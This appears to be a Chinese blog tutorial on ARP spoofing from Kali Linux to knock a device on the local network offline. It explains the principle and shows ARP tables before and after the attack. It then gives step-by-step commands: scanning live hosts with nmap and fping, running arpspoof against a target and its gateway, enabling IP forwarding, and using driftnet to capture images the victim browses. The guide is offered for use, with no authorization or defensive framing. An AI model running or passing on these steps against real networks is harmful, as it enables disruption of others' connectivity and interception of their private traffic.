Kali Linux | arp欺骗攻击[局域网断网攻击]

温馨提示:本文最后更新于2024-10-04 20:23:17,某些文章具有时效性,若有错误或已失效,请联系星雨站长

前言

本教程所涉及的一些工具暂时就不分享出来了,主要还是怕有的小伙伴拿去恶搞,愿意折腾就去搞kali,类似的工具有很多,请自行查找。其次,目前还未找到相关的解决方案,网上给出的解决方案大概都看了一下,大多数都不可靠!

arp攻击原理

ARP(地址解析协议)攻击的原理是利用了ARP协议的信任机制及其无认证性。ARP协议主要用于在局域网内将IP地址映射为MAC地址。具体来说,ARP攻击通过伪造ARP应答包,将攻击者的MAC地址映射到合法的IP地址上,从而欺骗目标设备,使其将数据包发送给攻击者。

举个例子

1.首先我们去目标机器上通过arp -a查看路由器的mac地址

S C:\WINDOWS\system32> arp -a

接口: 192.168.0.101 --- 0x12
  Internet 地址         物理地址              类型
  192.168.0.1           30-fc-68-f0-45-5f     动态
  192.168.0.255         ff-ff-ff-ff-ff-ff     静态
  224.0.0.22            01-00-5e-00-00-16     静态
  224.0.0.251           01-00-5e-00-00-fb     静态
  224.0.0.252           01-00-5e-00-00-fc     静态
  239.255.255.250       01-00-5e-7f-ff-fa     静态
  255.255.255.255       ff-ff-ff-ff-ff-ff     静态

可以看到现在的mac地址为30-fc-68-f0-45-5f

2.接着去kali上对目标机器进行arp欺骗

d2b5ca33bd20240819211006

3.这时你就会发现目标机器上的路由器mac地址已经了发生更改

PS C:\WINDOWS\system32> arp -a

接口: 192.168.0.101 --- 0x12
  Internet 地址         物理地址              类型
  192.168.0.1           00-0c-29-26-1b-ab     动态
  192.168.0.255         ff-ff-ff-ff-ff-ff     静态
  224.0.0.22            01-00-5e-00-00-16     静态
  224.0.0.251           01-00-5e-00-00-fb     静态
  224.0.0.252           01-00-5e-00-00-fc     静态
  239.255.255.250       01-00-5e-7f-ff-fa     静态
  255.255.255.255       ff-ff-ff-ff-ff-ff     静态

而这个mac地址刚好是kali的mac地址

d2b5ca33bd20240819211250

简单说就是:

  • ARP攻击是攻击者通过伪装,让目标设备把攻击者当成网络中的重要设备(比如路由器)。
  • 攻击者假装自己的设备是路由器,并告诉目标设备“我是路由器”,然后目标设备就会把数据发给攻击者,而不是发给真正的路由器。
  • 这样,攻击者就能偷看到、篡改甚至阻止目标设备的网络数据。

所以,ARP攻击的关键不是伪装成目标设备,而是伪装成目标设备要通信的网络设备,比如路由器或网关。

攻击教程

1.首先通过 route -n 获取局域网网关

d2b5ca33bd20240819191511

可以看到,我当前所在的局域网网关为192.168.0.1

2.通过nmap获取局域网存活的主机

d2b5ca33bd20240819183445

也可以通过fping -g 网段/24的方式获取局域网存活的主机

d2b5ca33bd20240819183836

3.通过ifconfig来查看自己的网卡信息

d2b5ca33bd20240819184115

4.接着使用arpspoof -i 自己网卡信息 -t 目标IP -r 网关对目标ip进行攻击

d2b5ca33bd20240819184347

这时你就会发现目标设备已经无法正常上网了!

扩展教程

开启IP转发

echo 1 >/proc/sys/net/ipv4/ip_forward

进行arp攻击

arpspoof -i eth0 -t targetIP -r gateway(具体参考上面)

新建一个窗口,安装driftnet

driftnet可用于获取目标IP游览的图片,在root模式下输入如下命令

apt-get update
apt-get install driftnet

安装完成后,运行driftnet -i 你的网卡

driftnet -i eth0

这时目标机器所浏览的图片都会显示出来。(经测试,并不是所有图片都能显示出来)

d2b5ca33bd20240819190414

使用Windows进行攻击

工具一:arp欺骗工具

d2b5ca33bd20240819191919

工具二:ArpSpoof

d2b5ca33bd20240819192532

© 版权声明
THE END
喜欢就支持一下吧!
点赞29赞赏 分享